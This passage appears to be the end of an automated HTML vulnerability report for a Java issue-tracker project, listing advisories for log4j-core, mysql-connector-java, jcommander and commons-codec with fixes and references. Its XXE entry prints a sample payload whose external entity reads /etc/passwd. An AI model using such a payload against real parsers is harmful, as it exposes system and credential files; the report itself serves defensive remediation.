                                    edu.mac.issuetracker:issue-tracker@0.1, edu.mac.issuetracker:issue-tracker-ear@0.1 and others
                    </li>
                </ul>
        
                <hr/>
        
        
                        <h3 class="card__section__title">Detailed paths</h3>
        
                    <ul class="card__meta__paths">
                                <li>
                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
                                        edu.mac.issuetracker:issue-tracker@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker:issue-tracker-ear@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker.issue:issue-tracker-issue-ejb@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        org.apache.logging.log4j:log4j-core@2.14.1
                                        
                                </span>
        
                            </li>
                    </ul><!-- .list-paths -->
        
            </div><!-- .card__section -->
        
              <hr/>
              <!-- Overview -->
              <h2 id="overview">Overview</h2>
        <p><a href="http://logging.apache.org/log4j/1.2/">org.apache.logging.log4j:log4j-core</a> is a logging library for Java.</p>
        <p>Affected versions of this package are vulnerable to Arbitrary Code Execution. <br /> <strong>Note:</strong> Even though this vulnerability appears to be related to the <a href="https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720">log4Shell vulnerability</a>, this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.</p>
        <p>An attacker with access to modification of logging configuration is able to configure <code>JDBCAppender</code> with a data source referencing a JNDI URI - which can execute malicious code.</p>
        <p>In the fixed versions, <code>JDBCAppender</code> is using <code>JndiManager</code> and disables JNDI lookups by default (via <code>log4j2.enableJndiJdbc=false</code>).</p>
        <h2 id="alternative-remediation">Alternative Remediation</h2>
        <p>If you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:</p>
        <ul>
        <li>Disable/remove <code>JDBCAppender</code></li>
        <li>If <code>JDBCAppender</code> is used, make sure that it is not configured to use any protocol other than Java<h2 id="remediation">Remediation</h2>
        Upgrade <code>org.apache.logging.log4j:log4j-core</code> to version 2.3.2, 2.12.4, 2.17.1 or higher.<h2 id="references">References</h2>
        </li>
        </ul>
        <ul>
        <li><a href="https://logging.apache.org/log4j/2.x/security.html">Apache Security Page</a></li>
        <li><a href="https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16">GitHub Commit</a></li>
        <li><a href="https://issues.apache.org/jira/browse/LOG4J2-3293">Jira Issue</a></li>
        <li><a href="https://www.openwall.com/lists/oss-security/2021/12/28/1">Openwall Mail</a></li>
        </ul>
        
              <hr/>
        
            <div class="cta card__cta">
                <p><a href="https://snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339">More about this vulnerability</a></p>
            </div>
        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
            <h2 class="card__title">XML External Entity (XXE) Injection</h2>
            <div class="card__section">
        
                <div class="label label--medium">
                    <span class="label__text">medium severity</span>
                </div>
        
                <hr/>
        
                <ul class="card__meta">
                    <li class="card__meta__item">
                        Package Manager: maven
                    </li>
                    <li class="card__meta__item">
                            Vulnerable module:
        
                            mysql:mysql-connector-java
                    </li>
        
                    <li class="card__meta__item">Introduced through:
        
        
                                    edu.mac.issuetracker:issue-tracker@0.1, edu.mac.issuetracker:issue-tracker-ear@0.1 and others
                    </li>
                </ul>
        
                <hr/>
        
        
                        <h3 class="card__section__title">Detailed paths</h3>
        
                    <ul class="card__meta__paths">
                                <li>
                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
                                        edu.mac.issuetracker:issue-tracker@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker:issue-tracker-ear@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker.staff:issue-tracker-staff-ejb@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        mysql:mysql-connector-java@8.0.26
                                        
                                </span>
        
                            </li>
                    </ul><!-- .list-paths -->
        
            </div><!-- .card__section -->
        
              <hr/>
              <!-- Overview -->
              <h2 id="overview">Overview</h2>
        <p><a href="https://mvnrepository.com/artifact/mysql/mysql-connector-java">mysql:mysql-connector-java</a> is a provides connectivity for client applications developed in the Java programming language with MySQL Connector/J, a driver that implements the Java Database Connectivity (JDBC) API.</p>
        <p>Affected versions of this package are vulnerable to XML External Entity (XXE) Injection via the <code>getSource()</code> method, due to a missing check for external entities.</p>
        <h2 id="details">Details</h2>
        <p>XXE Injection is a type of attack against an application that parses XML input.
        XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.</p>
        <p>Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.</p>
        <p>For example, below is a sample XML document, containing an XML element- username.</p>
        <pre><code>&lt;xml&gt;
        &lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
           &lt;username&gt;John&lt;/username&gt;
        &lt;/xml&gt;
        </code></pre>
        <p>An external XML entity - <code>xxe</code>, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of  <code>/etc/passwd</code> and display it to the user rendered by <code>username</code>.</p>
        <pre><code>&lt;xml&gt;
        &lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
        &lt;!DOCTYPE foo [
           &lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot; &gt;]&gt;
           &lt;username&gt;&amp;xxe;&lt;/username&gt;
        &lt;/xml&gt;
        </code></pre>
        <p>Other XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.</p>
        <h2 id="remediation">Remediation</h2>
        <p>Upgrade <code>mysql:mysql-connector-java</code> to version 8.0.27 or higher.</p>
        <h2 id="references">References</h2>
        <ul>
        <li><a href="https://github.com/mysql/mysql-connector-j/commit/4993d5735fd84a46e7d949ad1bcaa0e9bb039824">GitHub Commit</a></li>
        <li><a href="https://pyn3rd.github.io/2021/10/22/mysql-jdbc-xxe/">PoC</a></li>
        </ul>
        
              <hr/>
        
            <div class="cta card__cta">
                <p><a href="https://snyk.io/vuln/SNYK-JAVA-MYSQL-1766958">More about this vulnerability</a></p>
            </div>
        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
            <h2 class="card__title">Improper Authorization</h2>
            <div class="card__section">
        
                <div class="label label--medium">
                    <span class="label__text">medium severity</span>
                </div>
        
                <hr/>
        
                <ul class="card__meta">
                    <li class="card__meta__item">
                        Package Manager: maven
                    </li>
                    <li class="card__meta__item">
                            Vulnerable module:
        
                            mysql:mysql-connector-java
                    </li>
        
                    <li class="card__meta__item">Introduced through:
        
        
                                    edu.mac.issuetracker:issue-tracker@0.1, edu.mac.issuetracker:issue-tracker-ear@0.1 and others
                    </li>
                </ul>
        
                <hr/>
        
        
                        <h3 class="card__section__title">Detailed paths</h3>
        
                    <ul class="card__meta__paths">
                                <li>
                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
                                        edu.mac.issuetracker:issue-tracker@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker:issue-tracker-ear@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker.staff:issue-tracker-staff-ejb@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        mysql:mysql-connector-java@8.0.26
                                        
                                </span>
        
                            </li>
                    </ul><!-- .list-paths -->
        
            </div><!-- .card__section -->
        
              <hr/>
              <!-- Overview -->
              <h2 id="overview">Overview</h2>
        <p><a href="https://mvnrepository.com/artifact/mysql/mysql-connector-java">mysql:mysql-connector-java</a> is a provides connectivity for client applications developed in the Java programming language with MySQL Connector/J, a driver that implements the Java Database Connectivity (JDBC) API.</p>
        <p>Affected versions of this package are vulnerable to Improper Authorization via the <code>MysqlSQLXML::getSource()</code> function. A malicious actor with high privileges can access all of the MySQL connector&#39;s accessible data and crash the connectors.</p>
        <h2 id="remediation">Remediation</h2>
        <p>Upgrade <code>mysql:mysql-connector-java</code> to version 8.0.28 or higher.</p>
        <h2 id="references">References</h2>
        <ul>
        <li><a href="https://www.oracle.com/security-alerts/cpujan2022.html">Oracle Security Advisory</a></li>
        <li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2020583">RedHat Bugzilla Bug</a></li>
        <li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2047343">RedHat Bugzilla Bug</a></li>
        </ul>
        
              <hr/>
        
            <div class="cta card__cta">
                <p><a href="https://snyk.io/vuln/SNYK-JAVA-MYSQL-2386864">More about this vulnerability</a></p>
            </div>
        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
            <h2 class="card__title">Unsafe Dependency Resolution</h2>
            <div class="card__section">
        
                <div class="label label--medium">
                    <span class="label__text">medium severity</span>
                </div>
        
                <hr/>
        
                <ul class="card__meta">
                    <li class="card__meta__item">
                        Package Manager: maven
                    </li>
                    <li class="card__meta__item">
                            Vulnerable module:
        
                            com.beust:jcommander
                    </li>
        
                    <li class="card__meta__item">Introduced through:
        
        
                                    edu.mac.issuetracker:issue-tracker@0.1, edu.mac.issuetracker:issue-tracker-ear@0.1 and others
                    </li>
                </ul>
        
                <hr/>
        
        
                        <h3 class="card__section__title">Detailed paths</h3>
        
                    <ul class="card__meta__paths">
                                <li>
                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
                                        edu.mac.issuetracker:issue-tracker@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker:issue-tracker-ear@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker.staff:issue-tracker-staff-ejb@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        com.google.zxing:javase@3.2.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        com.beust:jcommander@1.48
                                        
                                </span>
        
                            </li>
                    </ul><!-- .list-paths -->
        
            </div><!-- .card__section -->
        
              <hr/>
              <!-- Overview -->
              <h2 id="overview">Overview</h2>
        <p><a href="https://github.com/cbeust/jcommander">com.beust:jcommander</a> is a Command line parsing framework for Java.</p>
        <p>Affected versions of this package are vulnerable to Unsafe Dependency Resolution due to resolving dependencies over an insecure channel (http).</p>
        <p>If the build occurred over an insecure connection, a malicious user could have perform a Man-in-the-Middle attack during the build and alter the build artifacts that were produced.
        In the case that any of these artifacts were compromised, any developers using them could be vulnerable.</p>
        <p><strong>Note:</strong> In order to validate that this artifact was not compromised, the maintainer would need to confirm that all of the artifacts published to the registry were not altered. Until this happens, we can not guarantee that this artifact was not compromised even though the probability that this happened is low. </p>
        <p>We have chosen to alert on this issue when maintainers either decided to issue CVEs themselves, or in cases when maintainers decided against performing audits on their build to verify they had not been compromised.</p>
        <h2 id="remediation">Remediation</h2>
        <p>Upgrade <code>com.beust:jcommander</code> to version 1.75 or higher.</p>
        <h2 id="references">References</h2>
        <ul>
        <li><a href="https://github.com/cbeust/jcommander/commit/3ae95595febbed9c13f367b6bda5c0be1c572c53">GitHub Commit</a></li>
        <li><a href="https://github.com/cbeust/jcommander/issues/465">GitHub Issue</a></li>
        <li><a href="https://medium.com/@jonathan.leitschuh/1fc329d898fb">Jonathan Leitschuh&#39;s Blog</a></li>
        </ul>
        
              <hr/>
        
            <div class="cta card__cta">
                <p><a href="https://snyk.io/vuln/SNYK-JAVA-COMBEUST-174815">More about this vulnerability</a></p>
            </div>
        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--low" data-snyk-test="low">
            <h2 class="card__title">Information Exposure</h2>
            <div class="card__section">
        
                <div class="label label--low">
                    <span class="label__text">low severity</span>
                </div>
        
                <hr/>
        
                <ul class="card__meta">
                    <li class="card__meta__item">
                        Package Manager: maven
                    </li>
                    <li class="card__meta__item">
                            Vulnerable module:
        
                            commons-codec:commons-codec
                    </li>
        
                    <li class="card__meta__item">Introduced through:
        
        
                                    edu.mac.issuetracker:issue-tracker@0.1, edu.mac.issuetracker:issue-tracker-ear@0.1 and others
                    </li>
                </ul>
        
                <hr/>
        
        
                        <h3 class="card__section__title">Detailed paths</h3>
        
                    <ul class="card__meta__paths">
                                <li>
                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
                                        edu.mac.issuetracker:issue-tracker@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker:issue-tracker-ear@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        edu.mac.issuetracker.staff:issue-tracker-staff-ejb@0.1
                                         <span class="list-paths__item__arrow">›</span> 
                                        commons-codec:commons-codec@1.11
                                        
                                </span>
        
                            </li>
                    </ul><!-- .list-paths -->
        
            </div><!-- .card__section -->
        
              <hr/>
              <!-- Overview -->
              <h2 id="overview">Overview</h2>
        <p><a href="https://commons.apache.org/proper/commons-codec">commons-codec:commons-codec</a> is a package that contains simple encoder and decoders for various formats such as Base64 and Hexadecimal.</p>
        <p>Affected versions of this package are vulnerable to Information Exposure. When there is no byte array value that can be encoded into a string the Base32 implementation does not reject it, and instead decodes it into an arbitrary value which can be re-encoded again using the same implementation. This allows for information exposure exploits such as tunneling additional information via seemingly valid base 32 strings.</p>
        <h2 id="remediation">Remediation</h2>
        <p>Upgrade <code>commons-codec:commons-codec</code> to version 1.13 or higher.</p>
        <h2 id="references">References</h2>
        <ul>
        <li><a href="https://github.com/apache/commons-codec/commit/48b615756d1d770091ea3322eefc08011ee8b113">GitHub Commit</a></li>
        <li><a href="https://issues.apache.org/jira/browse/CODEC-134">Jira Issue</a></li>
        </ul>
        
              <hr/>
        
            <div class="cta card__cta">
                <p><a href="https://snyk.io/vuln/SNYK-JAVA-COMMONSCODEC-561518">More about this vulnerability</a></p>
            </div>
        
        </div><!-- .card -->
      </div><!-- cards -->
    </div>
  </main><!-- .layout-stacked__content -->
</body>

</html>

